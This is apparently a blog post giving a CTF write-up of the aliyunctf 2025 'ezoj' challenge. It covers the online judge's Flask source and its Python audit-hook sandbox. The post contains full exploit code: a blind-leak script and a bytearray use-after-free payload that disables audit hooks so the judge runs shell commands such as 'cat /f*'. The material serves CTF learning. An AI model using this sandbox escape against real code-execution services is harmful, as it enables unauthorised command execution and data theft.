1412 字
7 分钟
aliyunctf_ezoj复现
2025-02-27

(这是一道来自aliyunctf_2025的web题目,这几天复现了一遍,感觉挺有意思,于是记录一下)

题目描述:#

alt text

题目分析:#

提供了一个链接,打开可以看到是一个oj系统,能上传运行自己编写的解题程序,返回AC,WA等判断结果: alt text 然后在页面下方可以看到有一行提示,view source at /source,访问/source拿到源码:

import os
import subprocess
import uuid
import json
from flask import Flask, request, jsonify, send_file
from pathlib import Path

app = Flask(__name__)

SUBMISSIONS_PATH = Path("./submissions")
PROBLEMS_PATH = Path("./problems")

SUBMISSIONS_PATH.mkdir(parents=True, exist_ok=True)

CODE_TEMPLATE = """
import sys
import math
import collections
import queue
import heapq
import bisect

def audit_checker(event,args):
    if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
        raise RuntimeError

sys.addaudithook(audit_checker)


"""


class OJTimeLimitExceed(Exception):
    pass


class OJRuntimeError(Exception):
    pass


@app.route("/")
def index():
    return send_file("static/index.html")


@app.route("/source")
def source():
    return send_file("server.py")


@app.route("/api/problems")
def list_problems():
    problems_dir = PROBLEMS_PATH
    problems = []
    for problem in problems_dir.iterdir():
        problem_config_file = problem / "problem.json"
        if not problem_config_file.exists():
            continue

        problem_config = json.load(problem_config_file.open("r"))
        problem = {
            "problem_id": problem.name,
            "name": problem_config["name"],
            "description": problem_config["description"],
        }
        problems.append(problem)

    problems = sorted(problems, key=lambda x: x["problem_id"])

    problems = {"problems": problems}
    return jsonify(problems), 200


@app.route("/api/submit", methods=["POST"])
def submit_code():
    try:
        data = request.get_json()
        code = data.get("code")
        problem_id = data.get("problem_id")

        if code is None or problem_id is None:
            return (
                jsonify({"status": "ER", "message": "Missing 'code' or 'problem_id'"}),
                400,
            )

        problem_id = str(int(problem_id))
        problem_dir = PROBLEMS_PATH / problem_id
        if not problem_dir.exists():
            return (
                jsonify(
                    {"status": "ER", "message": f"Problem ID {problem_id} not found!"}
                ),
                404,
            )

        code_filename = SUBMISSIONS_PATH / f"submission_{uuid.uuid4()}.py"
        with open(code_filename, "w") as code_file:
            code = CODE_TEMPLATE + code
            code_file.write(code)

        result = judge(code_filename, problem_dir)

        code_filename.unlink()

        return jsonify(result)

    except Exception as e:
        return jsonify({"status": "ER", "message": str(e)}), 500


def judge(code_filename, problem_dir):
    test_files = sorted(problem_dir.glob("*.input"))
    total_tests = len(test_files)
    passed_tests = 0

    try:
        for test_file in test_files:
            input_file = test_file
            expected_output_file = problem_dir / f"{test_file.stem}.output"

            if not expected_output_file.exists():
                continue

            case_passed = run_code(code_filename, input_file, expected_output_file)

            if case_passed:
                passed_tests += 1

        if passed_tests == total_tests:
            return {"status": "AC", "message": f"Accepted"}
        else:
            return {
                "status": "WA",
                "message": f"Wrang Answer: pass({passed_tests}/{total_tests})",
            }
    except OJRuntimeError as e:
        return {"status": "RE", "message": f"Runtime Error: ret={e.args[0]}"}
    except OJTimeLimitExceed:
        return {"status": "TLE", "message": "Time Limit Exceed"}


def run_code(code_filename, input_file, expected_output_file):
    with open(input_file, "r") as infile, open(
        expected_output_file, "r"
    ) as expected_output:
        expected_output_content = expected_output.read().strip()

        process = subprocess.Popen(
            ["python3", code_filename],
            stdin=infile,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
        )

        try:
            stdout, stderr = process.communicate(timeout=5)
        except subprocess.TimeoutExpired:
            process.kill()
            raise OJTimeLimitExceed

        if process.returncode != 0:
            raise OJRuntimeError(process.returncode)

        if stdout.strip() == expected_output_content:
            return True
        else:
            return False


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

观察一下源码,整个程序的流程大概就是,先把CODE_TEMPLATE与用户上传的代码拼接在一起然后执行,之后将输出的内容与参考答案进行比较,返回AC,WA等结果。由于题目描述中提到这个题目环境不出网,所以可以猜测应该是要想办法执行命令,然后通过延时或者布尔的方式把返回值带出来。 摸清楚方向,接下来我们先仔细观察一下这个oj系统对代码执行做了什么限制,先看看CODE_TEMPLATE里写了什么:

import sys
import math
import collections
import queue
import heapq
import bisect

def audit_checker(event,args):
    if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
        raise RuntimeError

sys.addaudithook(audit_checker)

可以看到这段代码使用audit hook设置了一些白名单: "import""time.sleep""builtins.input""builtins.input/result"
audit hook是 Python 3.8 引入的一个安全功能,audit hook机制允许注册一个回调函数,当特定事件发生时(如导入模块、执行系统命令等),这个回调函数会被调用,并接收事件名称和参数信息。具体到这段代码里,如果发生的事件不在白名单中,就会抛出 RuntimeError 异常,中止程序执行。
关于Audit events的含义可以查阅这篇文档
我们在本地拿os.system测试一下:

import sys

def audit_checker(event,args):
    if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
        raise RuntimeError('Operation not permitted: {}'.format(event))
sys.addaudithook(audit_checker)
import os
try:
    os.system('whoami')
except RuntimeError as e:
    print(e)

输出: alt text 可以看到因为os.system不在白名单内,程序抛出了一个RuntimeError异常,终止执行。 所以如果要执行命令,我们就要先绕过audit hook的限制。 具体怎么绕呢?这玩意是个白名单,不太可能直接绕过,所以应该有一些其他的技巧。搜索github可以找到这个项目, 他的原理大概就是利用python的一个UAF漏洞,把审计钩子的内存位置清零,从而禁用它们,非常的牛逼。虽然作为一名菜鸡web手确实不是很懂这玩意的细节,不过对着poc利用还是做得到的。 这个项目,首先,因为python版本不同审计钩子的偏移量也不同,所以我们需要先拿到服务器运行的python的版本,才能进一步利用,或者判断到底有没有利用的可能性。这里使用sys.version配合回显判断版本号:

import requests
import time

BASE_URL = "http://ip:port"
SUBMIT_URL = f"{BASE_URL}/api/submit"

def submit_code(code, problem_id=1):
    data = {
        "code": code,
        "problem_id": problem_id
    }
    response = requests.post(SUBMIT_URL, json=data)
    return response.json()

def test_version_char(pos, char):
    payload = f"""
import sys
ver = sys.version
if ver[{pos}] == '{char}':
    1/0
    """
    
    result = submit_code(payload)
    return result.get("status") == "RE"

def extract_version():
    found = ""
    for pos in range(10):
        for char in "0123456789.-+ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
            if test_version_char(pos, char):
                found += char
                print(f"Found character at position {pos}: {char}")
                print(f"Current version string: {found}")
                break
        time.sleep(0.1)
    return found

if __name__ == "__main__":
    print("Starting Python version extraction...")
    version = extract_version()
    print(f"Extracted version string: {version}")

最终结果: alt text 3.12.9,确实可以利用,这下就简单了,照着打就行了,结合payload稍微改一下之前的脚本:

import requests
import time

BASE_URL = "http://121.41.238.106:61085"
SUBMIT_URL = f"{BASE_URL}/api/submit"

def submit_code(code, problem_id=1):
    data = {
        "code": code,
        "problem_id": problem_id
    }
    response = requests.post(SUBMIT_URL, json=data)
    return response.json()

def test_version_char(pos, char):
    payload = f"""
import os
class UAF:
    def __index__(self):
        global memory
        uaf.clear()
        memory = bytearray()
        uaf.extend([0] * 56)
        return 1

uaf = bytearray(56)
uaf[23] = UAF()
PTR_OFFSET = [24, 48, 0x46890]
getptr = lambda func: int(str(func).split("0x")[-1].split(">")[0], 16)
ptr = getptr(os.system.__init__) + PTR_OFFSET[0]
ptr = int.from_bytes(memory[ptr:ptr + 8], 'little') + PTR_OFFSET[1]
res = int.from_bytes(memory[ptr:ptr + 8], 'little') + PTR_OFFSET[2]
memory[res:res + 8] = [0] * 8
out = os.popen('whoami').read()
if out[{pos}] == '{char}':
    1/0
    """
    
    result = submit_code(payload)
    return result.get("status") == "RE"

def extract_version():
    found = ""
    for pos in range(50):
        for char in "0123456789.-+ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/}{":
            if test_version_char(pos, char):
                found += char
                print(f"Found character at position {pos}: {char}")
                print(f"Current string: {found}")
                break
        time.sleep(1)
    return found

if __name__ == "__main__":
    print("Starting extraction...")
    version = extract_version()
    print(f"Extracted string: {version}")

成功拿到 whoami 命令执行结果: alt text 修改命令为 ls /f* 看到flag文件名应该是flag-xxxx的形式 alt text 直接 cat /f* 就可以得到flag alt text

aliyunctf_ezoj复现
https://blog.asteriax.site/posts/aliyunctf_2025_ezoj复现/
作者
ASTERIAX
发布于
2025-02-27
许可协议
CC BY-NC-SA 4.0